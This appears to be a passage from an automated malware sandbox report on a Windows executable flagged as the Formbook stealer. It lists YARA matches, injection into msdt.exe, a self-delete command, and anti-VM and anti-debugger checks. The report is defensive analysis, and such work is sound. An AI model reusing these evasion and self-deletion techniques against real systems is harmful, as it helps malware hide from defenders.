          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B32EF71_2_00B32EF7
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A86E301_2_00A86E30
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B2D6161_2_00B2D616
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B31FF11_2_00B31FF1
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_1_0041B8081_1_0041B808
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_1_004010301_1_00401030
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DDD4665_2_04DDD466
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D2841F5_2_04D2841F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DE25DD5_2_04DE25DD
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D2D5E05_2_04D2D5E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D425815_2_04D42581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DE1D555_2_04DE1D55
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DE2D075_2_04DE2D07
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D10D205_2_04D10D20
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DE2EF75_2_04DE2EF7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DDD6165_2_04DDD616
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D36E305_2_04D36E30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DE1FF15_2_04DE1FF1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DE28EC5_2_04DE28EC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D2B0905_2_04D2B090
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D420A05_2_04D420A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DE20A85_2_04DE20A8
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DD10025_2_04DD1002
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D1F9005_2_04D1F900
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D341205_2_04D34120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DE22AE5_2_04DE22AE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DDDBD25_2_04DDDBD2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D4EBB05_2_04D4EBB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DE2B285_2_04DE2B28
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_02A8A2AA5_2_02A8A2AA
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_02A72FB05_2_02A72FB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_02A8C7855_2_02A8C785
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_02A78C605_2_02A78C60
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_02A72D8E5_2_02A72D8E
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_02A72D905_2_02A72D90
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nss398D.tmp\8pspgamerixa.dll E6A148BE4604B24E27DD84E6586C73AB1139DDCA79B12C0298E5EE6CFFC832ED
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: String function: 00A6B150 appears 35 times
          Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 04D1B150 appears 35 times
          Source: h8lD4SWL35.exe, 00000000.00000003.226273879.0000000003296000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs h8lD4SWL35.exe
          Source: h8lD4SWL35.exe, 00000001.00000002.274293163.0000000000CEF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs h8lD4SWL35.exe
          Source: h8lD4SWL35.exe, 00000001.00000002.274487433.00000000026B0000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemsdt.exej% vs h8lD4SWL35.exe
          Source: h8lD4SWL35.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000000.00000002.235743198.0000000003150000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.235743198.0000000003150000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.273745174.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.273745174.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.231719819.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.231719819.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.491652950.0000000002A70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.491652950.0000000002A70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.273894363.00000000005B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.273894363.00000000005B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.273962735.00000000009F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.273962735.00000000009F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.492349966.0000000002EB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.492349966.0000000002EB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.492377238.0000000002EE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.492377238.0000000002EE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.h8lD4SWL35.exe.3150000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.h8lD4SWL35.exe.3150000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.h8lD4SWL35.exe.3150000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.h8lD4SWL35.exe.3150000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.h8lD4SWL35.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.h8lD4SWL35.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.h8lD4SWL35.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.h8lD4SWL35.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.h8lD4SWL35.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.h8lD4SWL35.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.h8lD4SWL35.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.h8lD4SWL35.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@17/10
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 0_2_004041CD GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004041CD
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 0_2_10005241 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,0_2_10005241
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 0_2_00402020 CoCreateInstance,MultiByteToWideChar,0_2_00402020
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:852:120:WilError_01
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeFile created: C:\Users\user\AppData\Local\Temp\nss398C.tmpJump to behavior
          Source: h8lD4SWL35.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: h8lD4SWL35.exeReversingLabs: Detection: 25%
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeFile read: C:\Users\user\Desktop\h8lD4SWL35.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\h8lD4SWL35.exe 'C:\Users\user\Desktop\h8lD4SWL35.exe'
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeProcess created: C:\Users\user\Desktop\h8lD4SWL35.exe 'C:\Users\user\Desktop\h8lD4SWL35.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\h8lD4SWL35.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeProcess created: C:\Users\user\Desktop\h8lD4SWL35.exe 'C:\Users\user\Desktop\h8lD4SWL35.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\h8lD4SWL35.exe'Jump to behavior
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
          Source: Binary string: msdt.pdbGCTL source: h8lD4SWL35.exe, 00000001.00000002.274487433.00000000026B0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: h8lD4SWL35.exe, 00000000.00000003.231736390.00000000031B0000.00000004.00000001.sdmp, h8lD4SWL35.exe, 00000001.00000002.273989113.0000000000A40000.00000040.00000001.sdmp, msdt.exe, 00000005.00000002.492878773.0000000004CF0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: h8lD4SWL35.exe, msdt.exe
          Source: Binary string: msdt.pdb source: h8lD4SWL35.exe, 00000001.00000002.274487433.00000000026B0000.00000040.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeUnpacked PE file: 1.2.h8lD4SWL35.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 0_2_00405CFB GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405CFB
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_004160D8 push ebp; ret 1_2_004160E6
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_0041C96C push cs; ret 1_2_0041C96D
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_0041B3B5 push eax; ret 1_2_0041B408
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_0041B46C push eax; ret 1_2_0041B472
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_0041B402 push eax; ret 1_2_0041B408
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_0041B40B push eax; ret 1_2_0041B472
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_0041C40D push esi; iretd 1_2_0041C40F
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_0041C485 push FFFFFFC3h; retf 1_2_0041C48D
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00415CA3 push edx; retf 1_2_00415CB3
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_0041CFC1 pushfd ; retf 1_2_0041CFC8
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_004187D8 push ss; ret 1_2_004187DB
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00ABD0D1 push ecx; ret 1_2_00ABD0E4
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_1_004160D8 push ebp; ret 1_1_004160E6
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_1_0041C96C push cs; ret 1_1_0041C96D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D6D0D1 push ecx; ret 5_2_04D6D0E4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_02A8B3B5 push eax; ret 5_2_02A8B408
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_02A860D8 push ebp; ret 5_2_02A860E6
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_02A8C96C push cs; ret 5_2_02A8C96D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_02A8CFC1 pushfd ; retf 5_2_02A8CFC8
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_02A887D8 push ss; ret 5_2_02A887DB
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_02A85CA3 push edx; retf 5_2_02A85CB3
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_02A8BC84 push 00000056h; retf 5_2_02A8BC86
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_02A8C485 push FFFFFFC3h; retf 5_2_02A8C48D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_02A8B40B push eax; ret 5_2_02A8B472
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_02A8C40D push esi; iretd 5_2_02A8C40F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_02A8B402 push eax; ret 5_2_02A8B408
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_02A8B46C push eax; ret 5_2_02A8B472
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_02A8BD57 push 00000062h; iretd 5_2_02A8BD59
          Source: initial sampleStatic PE information: section name: .data entropy: 7.83559790336
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeFile created: C:\Users\user\AppData\Local\Temp\nss398D.tmp\8pspgamerixa.dllJump to dropped file
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 0000000002A785E4 second address: 0000000002A785EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 0000000002A7897E second address: 0000000002A78984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_004088B0 rdtsc 1_2_004088B0
          Source: C:\Windows\explorer.exe TID: 5544Thread sleep time: -75000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\msdt.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\msdt.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 0_2_00405302 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00405302
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 0_2_00405CD4 FindFirstFileA,FindClose,0_2_00405CD4
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 0_2_0040263E FindFirstFileA,0_2_0040263E
          Source: explorer.exe, 00000002.00000000.257431635.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000002.00000000.241786208.0000000003710000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.257159050.0000000008270000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000002.00000002.496355098.000000000375C000.00000004.00000001.sdmpBinary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000002.00000002.496355098.000000000375C000.00000004.00000001.sdmpBinary or memory string: AASCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: msdt.exe, 00000005.00000002.492249248.0000000002E15000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW8h
          Source: msdt.exe, 00000005.00000002.492306734.0000000002E3E000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000002.00000000.238718631.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 00000002.00000000.257475076.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000002.00000000.257159050.0000000008270000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000002.00000002.501451803.00000000053D7000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000002.00000000.257159050.0000000008270000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000002.00000000.257475076.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: explorer.exe, 00000002.00000000.257159050.0000000008270000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_004088B0 rdtsc 1_2_004088B0
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00409B20 LdrLoadDll,1_2_00409B20
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 0_2_00405CFB GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405CFB
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 0_2_100056FB mov eax, dword ptr fs:[00000030h]0_2_100056FB
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 0_2_100058FE mov eax, dword ptr fs:[00000030h]0_2_100058FE
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AA90AF mov eax, dword ptr fs:[00000030h]1_2_00AA90AF
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A920A0 mov eax, dword ptr fs:[00000030h]1_2_00A920A0
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A920A0 mov eax, dword ptr fs:[00000030h]1_2_00A920A0
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A920A0 mov eax, dword ptr fs:[00000030h]1_2_00A920A0
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A920A0 mov eax, dword ptr fs:[00000030h]1_2_00A920A0
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A920A0 mov eax, dword ptr fs:[00000030h]1_2_00A920A0
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A920A0 mov eax, dword ptr fs:[00000030h]1_2_00A920A0
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A9F0BF mov ecx, dword ptr fs:[00000030h]1_2_00A9F0BF
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A9F0BF mov eax, dword ptr fs:[00000030h]1_2_00A9F0BF
